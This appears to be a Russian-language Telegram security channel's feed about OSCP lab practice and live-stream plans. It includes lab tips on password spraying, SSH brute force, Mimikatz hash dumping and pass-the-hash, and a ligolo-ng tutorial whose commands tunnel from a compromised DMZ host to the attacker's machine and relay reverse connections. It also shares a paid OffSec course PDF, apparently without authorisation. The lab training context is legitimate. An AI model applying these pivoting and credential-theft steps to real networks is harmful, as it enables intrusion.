Hack IT Easy
1.96K subscribers
18 photos
2 videos
6 files
46 links
Авторские мысли касаемо сферы ИБ. Разборы уязвимых виртуальных машин. Анализ защищенности веб-приложений и многое другое! Все материалы опубликованы исключительно с образовательной целью.
pm @wi_max

Our chat: https://t.iss.one/+cyUNAnrl2X44ZmM6
Download Telegram
EXP-301-2022(OSED).pdf
8.6 MB
EXP-301-2022 💻❗️

Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊

P.S. Видео тоже есть, если будет много желающих - загружу
🔥38👍3👾2🌭1
Всем привет❗️

Ни для кого не секрет, что сейчас проходит конференция OFFZONE.

Если кто-то хотел встретиться, пообщаться, познакомиться - буду рад!

Всем продуктивной конференции!💻🌀
🔥162
Решаем новые лабораторные работы OSCP🤖

Обновленный курс содержит 6 лабораторных работ. 3 из них являются полноценными сетями, решение которых подразумевает прохождение некоего сюжета, оставшиеся 3 - варианты экзамена OSCP. Также, одним из нововведений является то, что теперь инстансы запускаемых лаб являются персональными - других пользователей нет. Это очень классно, на мой взгляд, так как ранее случались такие ситуации, когда кто-то из пользователей осуществлял перезапуск сети, уничтожая все туннели, закрепления и вынуждая делать все заново.

Сегодня в двух словах хочу поделиться опытом решения первой лабы - Medtech.
Уровень сложности - ниже среднего. Основные техники, и навыки, которые потребуются:
- энумерация: определение версий используемых сервисов, просмотр исходного кода сервисов. Пристальное внимание необходимо обращать на самописные веб-приложения - в них можно обнаружить уязвимости. При планировании атак на домен рекомендую построить его наглядную карту при помощи Bloodhound - помогает понять, куда двигаться.
- password spraying: данная техника очень полезна при решении лабораторной работы. Некоторые детали, которые стоит отметить. Проводить такую атаку стоит предварительно просмотрев политики домена во избежание блокировок УЗ пользователей. Осуществлять атаку стоит не только по smb, но и по rdp (там где есть возможность); с этой задачей отлично справляется crackmapexec.
- bruteforce: можно попытаться перебрать пароль, например, в ситуации, когда из сервисов доступен только ssh. Я использую rockyou в качестве словаря, пока было достаточно.
- поиск артефактов: после повышения привилегий на целевой машине, рекомендую уделить время поиску паролей (дампу хэшей паролей из памяти, при помощи Mimikatz), важных файлов в директориях юзеров (да-да, я это упускал и долго блуждал в попытках найти решение). Таким образом, мы не пропустим важной информации и сможем продвинуться дальше, используя, например атаку PtH.

В целом, довольно понятный путь. Сейчас решаю следующую, надеюсь, скоро удастся с вами поделиться результатом.
Есть еще пара мыслей, которые хочется воплотить, анонс будет чуть позже🤫
👍18🔥21
Новый формат 📌 💻

Было внутреннее желание приурочить анонс к какой то знаменательной цифре, например, 1337 подписчиков😎

У меня не так давно появилась идея попробовать новый формат взаимодействия - стримы (примерно, как это делают зарубежные коллеги, например, IppSec).
Мне кажется, можно сколько угодно рассказывать о том, как надо, но без практики - это все тщетно. Существуют множество платформ, на которых размещены уязвимые виртуальные машины. Это и всем известный HackTheBox и PlayGrounds от OffensiveSecurity.
В общем, хочу попробовать в онлайн режиме вместе с Вами начать их решать, попутно рассказывая о каждом проделанном шаге и разбирая непонятные моменты. Очень надеюсь, что кому-то это придаст мотивации и желания стремиться и разбираться.

Разумеется без участия каждого из вас, эта идея обречена. Любая позитивная реакция под этим постом будет воспринята как солидарность с изложенной идеей!
👍79🔥17❤‍🔥4👨‍💻2
Привет, друзья! 💻
Ранее сообщал, что есть огромное желание сделать стрим, в ходе которого мы с вами будем решать уязвимые виртуальные машины. Мне кажется, мы готовы. Решать будем с Proving Grounds согласно листу OSCP-like машин. Стрим думаю провести прям здесь, в канале (вроде бы работает стабильно и позволяет задавать вопросы голосом).
Осталась одна маленькая деталь - определиться со временем. Слоты прикрепляю к опросу. Предложения и пожелания жду в комментарии или pm.
Всем хорошего дня!
🔥8
Когда проводим стрим?
Anonymous Poll
40%
07.10 (сб) 14:00 - 18:00
68%
08.10 (вс) 13:00 - 18:00
🔥15
Live stream started
Live stream finished (6 minutes)
Всем привет!
Возникли проблемы с микрофоном. Сейчас постараюсь устранить и мы начнем.
Прошу прощения за форс-мажор🙏🏻☺️
14
Live stream started
Live stream finished (3 hours)
Большое спасибо всем, кто пришел сегодня на стрим!🙏🏻

Надеюсь, получилось полезно и интересно. Будем дальше работать и развивать это направление, следите за анонсами💻

P.S. Всех, кого мучил вопрос: на заднем плане храпел наш пес😂
🔥24
Всем привет!
В эти выходные продолжим решать уязвимые виртуальные машины в онлайне и готовиться к OSCP. Опрос будет ниже. Жду каждого из вас 💻🙏🏻
🔥16😍4👍3
❤‍🔥17
Live stream scheduled for
Live stream started
Live stream finished (3 hours)
ligolo-ng или как принять бэк коннект из внутренней сети💻

Давайте смоделируем ситуацию, в которой нам необходимо туннелировать трафик не только во внутреннюю сеть, но и из нее. Когда это необходимо спросите вы? Например, мы имеем RCE на внутренней машине (DB01) (см.схему сети) и хотим принять бэк коннект на нашу kali. Очевидно, используя стандартные способы туннелирования, например, chisel, сделать это не удастся. В таком случае, можно использовать утилиту ligolo-ng. Почитать описание и функциональность можно самостоятельно. Я коротко расскажу как ее настроить и работать.

Необходимо загрузить прокси. Прокси ставится на наш Linux (kali). Создаем интерфейс для него и активируем:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

После того как добавили интерфейс, запускаем прокси:
./ligolo_proxy -selfcert

Идем на DMZ и подключаемся к нашему прокси (порт 11601 является портом по умолчанию):
ligolo_agent.exe -connect 192.168.45.220:11601 -ignore-cert

Отлично, мы установили коннект между сервером и агентом, но туннеля еще нет. Мы должны добавить маршрут до внутренней сети:
sudo ip route add 10.10.77.0/24 dev ligolo

После этого идем в kali, выбираем нужную сессию (sessions) и выполняем:
start

Отлично. Теперь мы имеем возможность обращения ко внутренним хостам сети.

Далее разберемся, как же нам передать файл или получить бэк коннект. На нашей kali (в прокси) выполняем следующую команду:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:5678

Теперь весь трафик с хоста DMZ, который приходит на порт 1234, будет идти на kali в 5678.

Забирай и пользуйся!😉
👍12🤩31🔥1
Finally💻💯
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥153👍257🎉6❤‍🔥32
Всем привет!

Поступали просьбы рассказать как прошел экзамен, оценить собственную подготовку и провести некоторую ретроспективу.
Предлагаю осуществить это в ближайшие выходные. Сделаем ставки в опросе и соберемся.
Буду рад видеть каждого! 🙂
Please open Telegram to view this post
VIEW IN TELEGRAM
👍112🔥2